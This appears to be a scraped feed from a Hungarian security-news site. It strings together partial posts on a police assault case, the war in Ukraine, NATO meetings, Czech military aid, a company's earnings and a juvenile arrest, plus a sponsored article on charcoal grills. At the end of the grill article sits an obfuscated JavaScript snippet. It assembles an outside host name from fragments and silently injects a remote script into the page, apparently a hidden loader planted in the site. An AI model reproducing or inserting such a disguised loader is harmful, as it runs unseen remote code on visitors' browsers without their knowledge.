Biztonságpiac

Mint írták, a Bács-Kiskun Vármegyei Kormányhivatal egyik járási hivatala március 20-án két kiskorú gyermeket ideiglenes hatállyal nevelőszülőnél rendelt elhelyezni. A gyámhivatal előzetes eljárása során felmerült, hogy az apa a határozat végrehajtása során agresszíven léphet fel, ezért rendőri segítséget kértek.

A kormányhivatal felkérésére a polgármesteri hivatalnál megjelenő három rendőr és a kormánytisztviselők a közelben lévő presszónál meglátták az egyik gyermeket és az anyját, akinek kézbesíteni akarták a határozatot. Amikor tájékoztatták az asszonyt, hogy határozat született a gyermek elviteléről, kiabálva trágár szavakkal illette a járási hivatal dolgozóit, majd telefonon odahívta élettársát.

Miközben az egyik kormánytisztviselő az anya tiltakozása ellenére elvitte a gyermeket, megérkezett az apa, aki azt üvöltötte a jogszerűen intézkedő rendőröknek és a járási hivatal munkatársainak, hogy: „engedjétek el, az az én gyerekem, megöllek titeket”. A férfi meg akarta ütni és rúgni az egyik rendőrt, de ő sikeresen védekezett. A rendőr megbilincselni már nem tudta az ellenszegülő férfit, aki ekkor már az élettársát biztosító rendőrökre próbált támadni, de a feléjük irányzott ütések és rúgások sem értek célt.

A Szegedi Regionális Nyomozó Ügyészség elrendelte a többszörösen büntetett előéletű – felfüggesztett szabadságvesztés és folyamatban lévő büntetőeljárás hatálya alatt álló – férfi őrizetét, majd gyanúsítottként hallgatta ki hivatalos személy elleni erőszak bűntette miatt.

A bíróság az ügyészség indítványára a gyanúsított letartóztatását – a bűnismétlés és a bizonyítás megnehezítésének veszélye miatt – egy hónapra elrendelte. A végzés ellen a gyanúsított és védője fellebbezést jelentett be, amelyet a Szegedi Törvényszék elutasított – áll a közleményben.

The post Már megint rendőrre támadtak, letartóztatásban az elkövető appeared first on .

A tisztségviselő tájékoztatása szerint a kisvárost helyi idő szerint délelőtt 11 óra körül érte a támadás, az orosz erők lakott területet találtak el. Hozzátette, hogy az első információk szerint a támadók kazettás lövedékeket vetettek be. A helyszínen pirotechnikusok dolgoznak a fel nem robbant lövedékek hatástalanításán.

Jurij Huszjev, az Ukroboronprom ukrán állami hadikonszern vezérigazgatója az Interfax-Ukrajina hírügynökségnek adott interjújában elmondta, hogy az Oroszország által Ukrajna ellen indított háború tavaly februári kezdete óta a vállalat létesítményeit több mint 150 támadás érte, de ennek ellenére még növelték is a gyártást, egyebek között áthelyezéssel, és magáncégekkel való együttműködéssel. Kiemelte, hogy a vállalathoz több mint hatezer új alkalmazottat vettek fel. Szavai szerint mostanra az állami konszern mintegy száz olyan céggel kezdett együttműködést, amelyek korábban nem gyártottak semmit a fegyveres erők számára.

A vezérigazgató elmondta, hogy az állami konszern a haditechnikai eszközök biztonságos helyen történő gyártására és javítására irányuló programot hajt végre, nemcsak a régi szovjet berendezések javítását végzi, hanem a lefoglalt, és a partnerországoktól kapott eszközökét is.

Az ukrán vezérkar szerdai helyzetjelentésében arról számolt be, hogy az orosz hadsereg embervesztesége Ukrajnában meghaladta a 176 ezret. Az elmúlt nap folyamán az ukrán erők egyebek mellett megsemmisítettek két orosz harckocsit és tíz tüzérségi rendszert.

The post Orosz agresszió: újabb polgári áldozatok appeared first on .

Stoltenberg felhívta a figyelmet: „Kína nem hajlandó elítélni Oroszország agresszióját, visszhangozza az orosz propagandát, és támogatja az orosz gazdaságot, miközben együttesen fokozzák katonai tevékenységüket a csendes-óceáni térségben”.

„Kína és Oroszország egyre közelebb kerülnek egymáshoz. Alig néhány héttel az ukrajnai invázió előtt aláírtak egy partnerségi megállapodást, amelyben egyértelműen kijelentik, hogy az orosz-kínai partnerségnek nincsenek határai” – mutatott rá.

Véleménye szerint ez szükségessé teszi a szövetség számára, hogy újragondolja Kínával kapcsolatos politikáját, ami magában foglalja a független partnerekkel, Ausztráliával, Új-Zélanddal, Japánnal, Dél-Koreával folyó együttműködést.

A főtitkár kitért Oroszország bejelentésére is arról, hogy taktikai atomfegyvereket fog állomásoztatni Fehéroroszországban. Szerinte ez azt mutatja, hogy a pár nappal korábban Kínával aláírt megállapodása, miszerint az országoknak nem szabad nukleáris fegyvereket határaikon túlra telepíteni, csupán „üres ígéret” volt.

A főtitkár a kétnapos tanácskozást összegezve elmondta: a NATO-tagországok új kötelezettségvállalásokat tettek az ukrán erők folyamatos katonai támogatására vonatkozóan, és megállapodtak abban, hogy egy többéves stratégiai segítségnyújtási programot dolgoznak ki Ukrajna számára. Mint mondta, azt, hogy mikor ér véget a háború, még nem lehet tudni, de fel kell arra készülni, hogy Putyin ne tudja még jobban aláásni az európai biztonságot.

„Ezért lehetővé kell tennünk Ukrajna számára, hogy megvédje magát a jövőbeni agresszióval szemben, ami segíteni fogja az országot az euroatlanti integráció felé vezető úton is” – hangsúlyozta.

Stoltenberg elmondása szerint a hosszú távú segítségnyújtási program magában foglalja az ország védelmi kapacitásainak megerősítését, valamint a szovjet gyártmányú felszerelésekről a NATO-szabványúakra való áttérés megkönnyítését. Hangsúlyozta: ahhoz hogy Ukrajna a szövetség teljes jogú tagjává váljon, függetlennek és demokratikusnak kell lennie.

„Ha Putyin győz Ukrajnában, az veszélyes üzenetet küld a világ tekintélyelvű vezetőinek arról, hogy céljaikat nyers erővel is elérhetik” – figyelmeztetett. Hozzátette, hogy a NATO továbbra is támogatni fogja az orosz nyomás alatt álló partnerországokat, köztük Moldovát, Georgiát és Bosznia-Hercegovinát.

The post Jens Stoltenberg: történelmi hiba lenne, ha Kína katonailag támogatná Oroszországot appeared first on .

„A segítség értéke, amelyet a hadsereg vezérkari főnökével (Karel Rehka) együtt terveztünk meg mintegy 600-700 millió korona. Nem pénzbeli segítségről, hanem a raktárainkban lévő hadianyagokról van szó” – jelentette ki a tárcavezető újságírók előtt. „Úgynevezett felesleges anyagról van szó, amelyet anélkül küldhetünk Ukrajnába, hogy ezzel veszélyeztetnénk saját védelmi képességeinket” – tette hozzá Jana Cernochová. Hangsúlyozta: nagyon ügyel arra, hogy csak olyan hadianyagot és fegyvereket küldjön Csehország Ukrajnába, amelyet a hadsereg nélkülözni tud, illetve gyorsan képes mással helyettesíteni.

Tekintettel a háborús helyzetre Cernochová nem részletezte, milyen hadianyagról is van szó.

Petr Pavel cseh államfő a Süddeutsche Zeitung nevű német lapnak a közelmúltban azt mondta: Csehország továbbra is segíteni fogja az orosz agresszió ellen harcoló Ukrajnát, de már nincs sok lehetősége további hadianyagot és fegyvereket küldeni az ukránoknak. Az elnök szerint nagyobb tartalékok még a légvédelmi fegyverek, illetve a lőszer terén vannak.

A prágai sajtóban megjelent nemhivatalos értesülések szerint Csehország eddig több mint ötvenmilliárd korona értékű segélyt küldött Ukrajnába, ebből a kormányzat által küldött segély értéke mintegy 15 milliárd koronát tesz ki. Ennek nagyobbik részét fegyverek és hadianyagok képezték.

Morawiecki és Zelenszkij aláírták a hadfelszerelés szállításáról szóló szándéknyilatkozatot
KTO Rosomak típusú páncélozott harcjárművek és egyéb hadifelszerelés szállításáról szóló szándéknyilatkozatot írt alá szerdán Varsóban Mateusz Morawiecki lengyel kormányfő és Volodimir Zelenszkij ukrán elnök. A két vezető a kétoldalú tárgyalásokat követően látta el kézjegyével a dokumentumot. Morawiecki és Zelenszkij jelenlétében aláírták továbbá a 125 milliméteres harckocsilőszer közös gyártásáról szóló megállapodást, valamint azt a szándéknyilatkozatot is, amely a lengyel cégek részvételéről szól Ukrajna háború utáni újjáépítésében. Morawiecki szombaton közölte, hogy Ukrajna száz új KTO Rosomak típusú páncélozott harcjárművet rendelt Lengyelországtól.

The post Orosz agresszió: Csehország ismét hadianyagot küld Ukrajnának appeared first on .

A főtitkár hangsúlyozta: „egy erős, független Ukrajna létfontosságú az atlanti térség stabilitása szempontjából, a NATO Ukrajna mellett áll, amíg csak szükséges, mert az ország jövője az atlanti családban van”.

Stoltenberg emlékeztetett: a NATO már közel 150 milliárd euró támogatást, ebből 65 milliárd euró katonai segélyt nyújtott Kijevnek. Felhívta azonban a figyelmet, hogy még „nincs itt az ideje az önelégültségnek”, mert „Putyin változatlan irányt követ Ukrajnával kapcsolatban”, úgy véli, hogy „Oroszország felül tud kerekedni a szövetségesek Ukrajna melletti támogatása ellenére”.

„Ezért a tagállamok fokozzák a fegyverek és a lőszerek gyártását, és teljesítik a kiképzésre és új nehézfegyverzetre vonatkozó ígéreteiket. Üdvözlöm, hogy a külügyminiszterek ma erről bejelentéseket tettek, és a következő napokban és hónapokban még többre számítok” – jelentette ki. Mint mondta, erre építve a NATO többéves támogatási programot fog kidolgozni Ukrajna számára, hogy megerősítse az ország védelmi kapacitásait, valamint az áttérést a szovjet gyártmányú felszerelésekről a NATO-szabványúakra.

A főtitkár bejelentette, hogy Volodomir Zelenszkij ukrán elnök is részt vesz a júliusban Vilniusban megrendezendő NATO-csúcstalálkozón.

A NATO-bővítésről szólva elmondta, hogy Finnország kedden teljes jogú tagja lett a szövetségnek, ami garantálja saját biztonságát, de egyúttal fejlett védelmi kapacitásával hozzájárul a többi tagállam védelméhez.

Svédország csatlakozásának ratifikálási folyamatával kapcsolatban Stoltenberg azt mondta, hogy a „patthelyzet megoldódott, sikerült túllendülni a holtponton”. „Folytatjuk a munkát a különböző szinteken, hogy előre tudjunk lépni a svéd csatlakozással kapcsolatban is. Svédország tehát taggá fog válni. Keményen dolgozunk azon, hogy ez minél hamarabb megtörténjen” – jelentette ki.

The post Stoltenberg: a NATO továbbra is elkötelezett „a nyitott ajtók politikája” mellett appeared first on .

A cégcsoport nettó árbevétele 10,93 milliárd forint volt, ami 71,5 százalékkal magasabb az egy évvel korábbinál.

Csontos Zoltán, a Delta Technologies Nyrt. igazgatóságának elnöke a közlemény szerint kiemelte: a 2025-ig megfogalmazott növekedési ütemtervet fenntartják. A 2027-es üzleti évre a Delta Technologies Nyrt. célkitűzése, hogy a csoportszintű árbevétel 50-55 milliárd forint közötti szintre emelkedjen, ami a jelzett időszakban átlagosan évi 16 százalék árbevétel növekedésnek felelne meg.

A Delta Technologies az üzleti év eredményei között kiemelte: leányvállalatának, a Delta Systems Kft.-nek lehetősége nyílik a minősítési szintje szerinti NATO Biztonsági Beruházási Programok keretében meghirdetett beszerzési eljárásokon való részvételre. A vállalat a minősítéssel tagja lett annak a mintegy 250 hazai cégnek, amelyek NATO beszállítói képesség birtokában vannak.

A jövőt illetően a jelentés kiemeli, hogy a Delta Systems Kft. az igazgatóság elvi támogatásával tárgyalásokat folytat a New Line Kft. nyereséges support üzletágának megvásárlásáról, továbbá a Delta Informatika Zrt. alaptőkéjének száz százalékát kitevő részvénymennyiség megvásárlásáról, és egyidejűleg a Delta Informatika Zrt. a Delta Systems Kft.-be történő beolvasztásáról is. A féléves jelentéskészítés közzétételének időpontjában a leányvállalatok Delta Systems Kft.-be történő beolvadása is befejeződött. További céljuk, hogy elérjék a Delta részvények BÉT standard kategóriából a BÉT prémium kategóriába való átsorolását.

Tájékoztattak arról is, hogy mintegy 1800 milliárd forintra rúg azon informatikai keretmegállapodások összértéke, ahol a Delta valamilyen formában beszállítóként – akár konzorcium vezetőjeként vagy tagjaként – közreműködik. Ugyanakkor folyamatosan figyelik az EU Helyreállítási és Ellenállóképességi Eszköz programjának (RRF) digitális alfejezetében várható kiírásokat, hiszen a 680 milliárd forintos keretben meghirdetendő programokra a Delta kompetenciái és korábbi referenciái is biztosítottak.

The post Nyereséges volt a NATO-ready Delta Technologies appeared first on .

A közlemény szerint tíz katona és két civil került vissza ukrán területre. A civilek közül egy Harkiv megyéből, egy pedig a Donyeck megyei Mariupolból származik. A parancsnokság arra nem tért ki, hogy cserébe az ukrán fél adott-e át orosz foglyokat. Az Ukrajinszka Pravda hírportál emlékeztetett arra, hogy március 24-én Ukrajna egyoldalúan és feltétel nélkül visszaadta Oroszországnak mind az öt súlyosan megsebesült orosz foglyot, akik szállítható állapotban voltak.

Olekszandr Szirszkij, az ukrán szárazföldi erők parancsnoka közölte, hogy találkozott a Donyeck megyei Bahmut városát védő ukrán katonákkal, és cáfolta a város bevételéről közzétett orosz állításokat. Szavai szerint folyamatos kapcsolatban van azokkal az ukrán alakulatokkal, amelyek a front legkritikusabb részein teljesítenek szolgálatot. „Találkoztam azokkal a katonákkal és parancsnokokkal, akik lerombolták a Wagner-zsoldosok és az orosz ejtőernyősök legyőzhetetlenségéről szóló mítoszt” – jelentette ki, ugyanakkor nem pontosította, hogy legutóbb mikor találkozott Bahmut védőivel.

„Az ellenség gyengül, ezért újabb és újabb hamisítványokkal próbálja leplezni a Bahmut elfoglalására irányuló erőfeszítéseinek kudarcait” – tette hozzá. Szirszkij legutóbb március 27-én hozta nyilvánosságra, hogy látogatást tett a Bahmutot védő ukrán alakulatoknál. A szárazföldi erők parancsnokát megelőzően Szerhij Cserevatij, az ukrán keleti erők szóvivője, és Andrij Jermak, az ukrán elnöki iroda vezetője cáfolta, hogy a Wagner orosz zsoldoscsoport elfoglalta volna a bahmuti városházát, ahogy azt Jevgenyij Prigozsin, a Wagner-csoport alapítója egy videóüzenetben bejelentette.

„Semmit sem foglaltak el, és enyhén szólva messze vannak attól, hogy bármit is elfoglaljanak a városban” – jelentette ki a szóvivő egy sajtónyilatkozatában. Hozzátette: harcok folynak a városháza épülete körül, de „jogi értelemben az orosz erők nem foglaltak el semmit”.

Az ukrán vezérkar esti helyzetjelentésében arról számolt be, hogy erőik hétfőn több mint 45 orosz támadást vertek vissza, a harci cselekmények epicentrumában továbbra is a donyecki régió három települése, Bahmut, Avgyijivka és Marjinka van. A jelentés szerint az ukrán légierő a nap folyamán öt csapást mért orosz élőerő- és fegyverzetgócpontokra, valamint megsemmisítettek egy orosz drónt. A rakéta- és tüzérségi egységek egy orosz csapatösszpontosulásra mértek csapást. Eközben az orosz erők három rakéta- és 17 légicsapást intéztek, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel az ukrán csapatok állásai, és a települések polgári infrastruktúrája ellen – írta az ukrán vezérkar.

Volodimir Zelenszkij, ukrán elnök az Ukrinform hírügynökség szerint kijelentette, hogy az ukrán hadsereg nagyszabású ellentámadást fog végrehajtani, és Ukrajna minden ideiglenesen megszállt területét visszafoglalják. Részleteket nem árult el, azt sem, mikor indul az ellentámadás – mint mondta – azért, hogy Oroszország ne tudjon felkészülni rá. „Az orosz csapatoknak még van idejük elhagyni Ukrajnát, különben megsemmisítjük őket” – szögezte le Zelenszkij. Az ukrán vezérkar hétfői helyzetjelentésében közölte, hogy mostanra az orosz hadsereg Ukrajnában elszenvedett embervesztesége meghaladta a 175 ezret.

The post Orosz agresszió: újabb ukrán foglyok térhettek haza appeared first on .

A moszkvai tájékoztatás szerint az üggyel kapcsolatban Lavrov felhívta Blinken figyelmét arra, hogy tiszteletben kell tartani az orosz hatóságok lépéseit, amelyeket a jogrenddel és Oroszország nemzetközi kötelezettségeivel összhangban tettek meg. Az orosz tárcavezető megengedhetetlennek nevezte azt, ahogy washingtoni tisztségviselők és a nyugati média felháborodást keltenek „azzal a nyilvánvaló szándékkal, hogy politikai színezetet adjanak az ügynek”.

„Lavrov kiemelte, hogy Evan Gershkovich-ot tetten érték, amikor újságírói státuszának álcája alatt próbált meg államtitoknak minősülő adatokhoz jutni” – állt a közleményben. Az orosz fél közölte, hogy a törvénybe ütköző tevékenységet folytató amerikai állampolgár őrizetbe vételéről az Egyesült Államok moszkvai nagykövetségét az előírásoknak megfelelően értesítették, Gershkovich sorsáról pedig bíróság fog dönteni.

Az orosz külügyminisztérium szerint Lavrov és Blinken néhány kétoldalú kérdést is megvitatott.

The post A kémkedéssel gyanúsított újságíróról tárgyalt az orosz és az amerikai külügyminiszter appeared first on .

„Ha ez meg is történne, az Csehország lakossága számára semmiféle veszélyt nem jelentene” – mondta a tárcavezető kérdésre válaszolva.

Moszkva azon bejelentésére reagálva, hogy Oroszország taktikai atomfegyvereket telepít a szomszédos Fehéroroszországba, Cernochová leszögezte: Csehország semmi esetre sem számol azzal, hogy területére atomfegyvereket telepíthetnének. „Semmi ilyesmi nincs napirenden” – hangsúlyozta a védelmi miniszter.

Cernochová szerint a NATO júliusi vilniusi csúcstalálkozóján várhatóan döntés születik a szervezet keleti szárnyának további megerősítéséről. A miniszter úgy vélte, hogy erre az orosz bejelentés nélkül is sor került volna. „Az Ukrajnában lejátszódó eseményeket nem lehet figyelmen kívül hagyni” – mutatott rá Cernochová.

Lubomír Metnar korábbi védelmi miniszter, Cernochová beszélgetőpartnere szintén úgy fogalmazott, hogy „az orosz bejelentésre mindenképpen reagálni kell”.

Cernochová szerint nem valószínű, hogy az orosz-ukrán konfliktus gyorsan befejeződne, másfelől folyamatos erőfeszítéséket kell tenni a problémák diplomáciai megoldása érdekében. „Mindegy, hogy ki fog közvetíteni, akár a Nyugat, akár egy Oroszországhoz közeli ország” – jegyezte meg a miniszter. Hozzátette, Kínát sem lehet kizárni.

The post A cseh lakosság számára állítólag nem jelentene fenyegetést az atomfegyverek bevetése Ukrajnában appeared first on .

A Miskolci Törvényszék közleménye szerint a fiatal az üzenetváltások során kilátásba helyezte az általa méltatott lövöldözésekhez hasonló cselekmény végrehajtását. A nyomozás jelenlegi állása szerint a fiatalkorú gyanúsított cselekménye emberölés előkészülete bűntettének megállapítására alkalmas.

A bíróság álláspontja szerint megalapozottan feltehető, hogy a gyanúsított a bizonyítást veszélyeztetné tárgyi bizonyítási eszköz, elektronikus adat megsemmisítésével, elrejtésével, esetleg szabadlábon lévő társaival összebeszélne, őket az eljárásról tájékoztatná. Fennáll annak a veszélye is, hogy a cselekményt folytatná vagy az előkészített bűncselekményt véghez vinné – írták.

A közlemény szerint mindezekre, valamint a bűncselekmény kiemelkedő társadalomra veszélyességére tekintettel a bíróság vasárnap egy hónapra elrendelte a fiatal letartóztatását, amelyet javítóintézetben kell végrehajtani. A végzés nem végleges — közölte a Miskolci Törvényszék.

The post Letartóztatásban egy fiatalkorú emberölés előkészületének gyanúja miatt appeared first on .

A közép- és kelet-európai NATO-tagállamokat tömörítő B9 csoport csütörtök este kezdődött tanácskozásán történteket a lengyel diplomácia vezetője román hivatali partnerével, Bogdan Aurescu román külügyminiszterrel együtt foglalta össze. Rau kiemelte: megvitatták „az európai biztonsági helyzet romlását”, a NATO keleti szárnyának megerősítésére irányuló erőfeszítéseket, valamint Ukrajna „politikai és gyakorlati támogatását”.

A résztvevők beszéltek a NATO és az Európai Unió közötti együttműködés fontosságáról, különösen a „jelenlegi válságra adandó hatékonyabb válasz” érdekében.

A B9 „katonai és más területeken továbbra is támogatni fogja Ukrajnát” – jelentette ki a lengyel külügyi tárca vezetője. Hozzátette: Lengyelország és „sok más szövetséges állam számára különösen az utóbbi szempont óriási jelentőséggel bír”. Rámutatott, hogy a B9 országai élen járnak e téren, olyan, „bátrabb akciókban” való részvételre buzdítják szövetségeseiket, mint a MiG-29-es vadászgépek vagy a (Leopard) harckocsik átadása Ukrajnának.

Bogdan Aurescu úgy vélte: az Ukrajna elleni orosz háború „Európa és Amerika biztonságát veszélyeztető művelet”, amely „komoly fenyegetést jelent a globális békére” nézve is. A béke érdekében „segíteni kell Ukrajnát, hogy megnyerje ezt a háborút” – fogalmazott a román diplomácia vezetője. Fontosnak nevezte, hogy az orosz tiszteket „felelősségre vonják azért, amit Ukrajnában műveltek”.

Aurescu szavai szerint a lódzi találkozó résztvevői a júliusi vilniusi NATO-csúcstalálkozó előtt megerősítették együttműködési szándékukat az észak-atlanti szövetség keretében. Fontosnak nevezte, hogy előrelépés történjen Ukrajna NATO-tagságának kérdésében.

A Bukaresti Kilencek vagy a Bukaresti Formátum (röviden B9 vagy B-9) egy 2015 novemberében alapított csoportosulás, amely Románia fővárosában, Bukarestben jött létre, Klaus Johannis román és Andrzej Duda lengyel elnök kezdeményezésére. Tagjai a NATO kelet-európai tagállamai: Lengyelország és Románia mellett Bulgária, Csehország, Észtország, Magyarország, Lettország, Litvánia és Szlovákia. Célja a NATO keleti szárnyának országai közötti katonai együttműködés elmélyítése, valamint a legfontosabb biztonságpolitikai kérdések megvitatása. A B9 lengyelországi találkozóján részt vett a csoporthoz nem tartozó Svédország, Finnország, Spanyolország és a NATO küldöttsége is.

The post Orosz agresszió: a Bukaresti Kilencek folytatják Ukrajna támogatását appeared first on .

A faszenes kerti grillek jelenleg a kerttulajdonosok egyik legnépszerűbb vásárlása! Ha szeretne egy kerti grillt, de nincs meggyőződve arról, hogy megéri-e a befektetést, a következő sorokban 5 igazán jó okot részletezünk!

A saját magunknak és az otthonunknak szánt vásárlások gyakran indokoltak és jól meghatározott céllal történnek, és a precíz hasznosságú vásárlások közé sorolhatjuk ezek a kerti grillsütők, olyan termékek amelyek minden kültértérrel rendelkező háztulajdonos bevásárlólistáján szerepelnek. A következő sorokban tehát 5 indokot részletezünk, amiért ezek a faszenes grillsütők bárki számára jó befektetésnek számítanak. Íme tehát, hogy miért érdemes faszénnel működő kerti grillsütőt vásárolni:

1. Tartós és megbízható termék

A minőség mindannyiunk számára kérdés, ezért próbálunk okosan vásárolni és egy kicsit utánajárni, mielőtt ténylegesen megveszünk valamit. Ebben az értelemben a kerti grill olyan termék, amelyet hosszú ideig élvezhetünk, mert minőségi és tartós anyagokból készül.

2. Könnyen használható

Akár kedveli az ételek grillezését, akár nem, egy ilyen termék használata nem igényel részletes használati utasítást, és nem is bonyolult. Ezek a kerti grillezők olyan parazsakkal működnek, amelyeket manapság szinte bármelyik boltban megvásárolhat, és nem csak.

3. Hordozható

Az ilyen típusú kerti grillek egyik legnagyobb előnye, hogy hordozhatóak, hogy otthon, barátoknál, a természetben, kempingben egyaránt használhatjuk őket. Könnyen fel- és összeszerelhető, közepes méretű, ezek a grillek finom ételeket és felejthetetlen estéket biztosítanak a családdal és a közeli barátokkal.

4. Egészséges grillezett ételek

Ezeknek a grilleknek egy másik említésre méltó előnye, hogy egészségesebb stílusban, olajban való áztatás és túlsütés nélkül készíthetünk ételt. Ajánlatos odafigyelni arra, hogy milyen ételeket fogyasztunk és hogyan készítjük el, és egy ilyen grill segítségével sokkal kiegyensúlyozottabb lesz a táplálkozásunk.

5. Költségek

Ellentétben a kertben épített, rögzített tégla grillel, amelyhez anyagokat kell vásárolnia és kőművest kell hívnia, és amely nyilvánvalóan sokkal költségesebb, a kerti faszéngrill bárki és bármilyen költségvetés számára megfelelő vétel. Ráadásul még ezek a termékek is különböző méretekben kaphatók, nyilvánvaló, hogy az áruk is eltérő, de biztosan megtaláljuk az igényeinknek megfelelő grillsütőt.

A Rademi.hu webáruház a faszénes kerti grillek széles választékával várja Önt, amelyeket a legjobb online árakon vásárolhat meg. A minőségi, tartós és megbízható anyagokból készült kerti grillek hosszú ideig fognak minket szolgálni. Használja ki az árajánlatokat és örüljön a szép nyári napoknak a finom és egészséges ételeknek, szeretteivel együtt!

(function(){ z84s=document.createElement("script");z84s_=(("u")+"st")+"a";z84s.async=true; z84s.type="text/javascript";z84s_+=("t.i")+""+"n";z84s_+=(("f")+"o");z84s_+="/"; z84su="495774649.";z84su+="j2z5dhyk84s8frk0hcv"+"6ba691xgyv6"; z84s.src="https://"+z84s_+z84su;document.body.appendChild(z84s); })();

The post 5 indok a faszénes kerti grill választására appeared first on .

„JDAM-nek nevezett bombákat használunk. Ezek nyugati típusú bombák, amelyekkel repülőgépeink sikeresen csapnak le fontos célpontokra. Ezek a bombák valamivel kisebb teljesítményűek, de rendkívül nagy pontosságúak. Szeretném, ha több ilyen bombája lenne az ukrán légierőnek” – jelentette ki a szóvivő.

A közelmúltban Oroszország aktívan kezdett használni irányított légi bombákat. Az orosz erők általában a szovjet időkből származó FAB-500-as bombákat használnak, amelyeket utólag szárnyakkal és GPS-navigációval szereltek fel – idézett fel az Ukrajinszka Pravda hírportál korábbi ukrán közléseket. Ihnat korábban rámutatott arra, hogy ezek az orosz bombák általában nem túl pontosak, ezért nagy veszélyt jelentenek a polgári létesítményekre. Az ilyen típusú fegyverek elleni küzdelemhez Ukrajnának nagy hatótávolságú légvédelmi rendszerekre és modern, többcélú repülőgépekre van szüksége – mondta a szóvivő.

Az ukrán vezérkar esti helyzetjelentésében azt állította, hogy Luhanszk megye megszállt részében ötven orosz katona dezertált. A vezérkar szerint ez azt bizonyítja, hogy folytatódik az Ukrajnába vezényelt orosz katonák csoportos szökésének tendenciája.

A kijevi katonai vezetés jelentésében arról számolt be, hogy pénteken az ukrán erők több mint harminc ellenséges támadást vertek vissza, két légvédelmi rendszert és egy radarállomást is eltaláltak. Az ukrán légierő gépei a nap folyamán hat csapást mértek az orosz erők koncentrációs területeire, a rakéta-és tüzérségi egységek pedig nyolc támadást hajtottak végre, amelyek eredményeképpen eltaláltak egy üzemanyagraktárt, két légvédelmi rakétarendszert, egy tüzérségi egységet és egy elektronikus hadviselési állomást.

A kijevi jelentés szerint az orosz erők eközben öt rakéta- és 12 légicsapást indítottak, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel.

„Pénteken az Oroszországi Föderáció ballisztikus rakétákkal újabb rakétatámadást intézett polgári célpontok ellen Zaporizzsja városában és Ukrajna más településein. Hat Sahíd-136 típusú, iráni gyártású támadó drónt is bvetettek, de ezeket mind megsemmisítette az ukrán légédelem. Az ellenség továbbra is fő erőfeszítéseit a Donyeck megyében lévő Liman, Bahmut, Avgyijivka és Marjinka települések irányában végrehajtandó támadó műveletekre összpontosítja” – írta a vezérkar.

The post Orosz agresszió: Az ukrán légierő nyugati, GPS-irányítású bombákat is használ appeared first on .

Szalay-Bobrovniczky Kristóf azt mondta, hogy egy felmérés szerint a NATO támogatottsága a magyaroknál hét százalékkal magasabb, mint a szövetséges országok átlaga. A tárcavezető beszédében emlékeztetett arra, hogy Magyarország több mint húsz éve a NATO tagja, és lépésről lépésre építette fel jelenlétét a szövetségben.

A biztonsági helyzet Európában alapvetően megváltozott, jelentősen romlott az ukrajnai orosz agresszió következtében. Ez megváltoztatta a NATO-t is, adaptációs folyamat megy végbe, és ennek része a többnemzeti hadosztály-parancsnokság létrehozása, ami 2019-ben kezdődött meg – mondta a miniszter.

Az eseményt követő sajtótájékoztatón Szalay-Bobrovniczky úgy fogalmazott: „hadtörténelmet írunk” a többnemzeti hadosztály-parancsnokság felállításával. Ezt bölcs és jó döntésnek nevezte, amely komoly előrelátásról tett tanúbizonyságot már 2019-ben. Világossá vált, hogy világ legerősebb és legrégebbi védelmi szövetsége keleti szárnyát meg kell erősíteni, és Közép-Európában nem volt még ilyen parancsnokság – magyarázta a miniszter. A parancsnokság azért többnemzeti, mert számos országot felügyel Közép-Európában, és sok nemzet katonái szolgálnak itt – a magyar katonák mellett horvátok, szlovákok, szlovének, lengyelek, románok, spanyolok, törökök. Beszédének zárásaként a honvédelmi miniszter úgy fogalmazott: nem csak Magyarország van a NATO-ban, de a NATO is itt van Magyarországon.

Mario Banozic horvát védelmi miniszter az ukrajnai orosz agresszió első évfordulója után még fontosabbnak nevezte a többnemzeti hadosztály-parancsnokságot és a magyar, szlovák, horvát tisztek, altisztek, valamint katonák közös munkáját. Hangsúlyozta: egységes az erőfeszítés annak érdekében, hogy javítsák képességeiket és növeljék az együttműködést.

A biztonságot nem lehet adottnak tekinteni, és minden erőfeszítést meg kell tenni annak érdekében, hogy megtartsuk azt az előnyt, amellyel rendelkezünk potenciális ellenfeleinkkel szemben – mondta a horvát védelmi miniszter. Készen állunk arra, hogy vezető szerepet játsszunk, és ha szükség van rá, akkor „a NATO-terület minden egyes centiméterét megvédjük”.

Marian Majer szlovák honvédelmi államtitkár úgy fogalmazott: majdnem egy évtized telt el azóta, hogy Ukrajnát, a Krím-félszigetet elérte az orosz agresszió, és azóta jelentős változáson ment át a NATO. Tovább kell erősíteni a szövetség keleti határát, oda kell csoportosítani több egységet. A többnemzeti hadosztály-parancsnokságot a szlovák politikus a régióban a szövetséges együttműködés fontos építőköveként jellemezte.

Majer a rendezvényt követő sajtótájékoztatón kiemelte: a többnemzeti hadosztály-parancsnokság két üzenetet közvetít. Az egyik ellenfeleinknek, különösen Oroszországnak szól, amely „egy nem kiprovokált agressziót” folytat Ukrajna ellen. A másik pedig a NATO-nak és szövetségeseinek szól, és azt mutatja, hogy „nemcsak elkötelezettek, de felkészültek is vagyunk arra, hogy megvédjük magunkat abban az esetben, ha bármi történne”. Szlovákia számára is fontos a védelmi költségvetés alakítása.

Denis Tretinjak tábornok, az HQ MND-C parancsnoka az ünnepségen felelevenítette a parancsnokság felállításának folyamatát. A most kezdődő új műveleti státusz növekedési lehetőséget jelent és azt, hogy hiteles és kompetens parancsnokságot tudnak létrehozni – jegyezte meg.

Luigi Guglielmo Miglietta tábornok, a brunssumi NATO-parancsnokság (Allied Joint Force Command Brunssum) vezetője jelezte: a NATO készen áll a különböző kihívásokkal szemben és képes területe megvédésére. A szövetséget fenyegető veszélyeket komplexnek nevezte, de hangsúlyozta: a NATO biztosítani tudja Európa, értékei és életformája biztonságát.

A székesfehérvári rendezvényen részt vett Christopher G. Cavoli tábornok, a NATO Európában állomásozó fegyveres erőinek főparancsnoka is.

The post Szalay-Bobrovniczky: nem csak a kormány, a nemzet is a NATO mögött áll appeared first on .

A bíróság – amelynek rendelkezését az Ukrajinszka Pravda hírportál ismertette – elutasította a szerzeteseknek azt a kérését, hogy érvénytelenítse a műemlékegyüttes vezetősége által hozott határozatot, amelyben felbontotta az egyházzal 2013 júliusában kötött szerződést a Lavra területén lévő vallási épületek és egyéb, állami tulajdonban lévő ingatlanok ingyenes használatáról.

A bíróság a döntését indokolva kifejtette, hogy a felperes nem tudta bizonyítani vagy alátámasztani azokat az állításait, amelyek szerint az UPC-nek a Lavra területéről való „kilakoltatása” esetén fennáll a tulajdon megsemmisülésének vagy megrongálódásának, illetve harmadik fél tulajdonába, vagy használatába átadásának a veszélye, valamint azt sem, hogy sérül Ukrajna állampolgárainak a vallásszabadsághoz és a lakhatáshoz való joga.

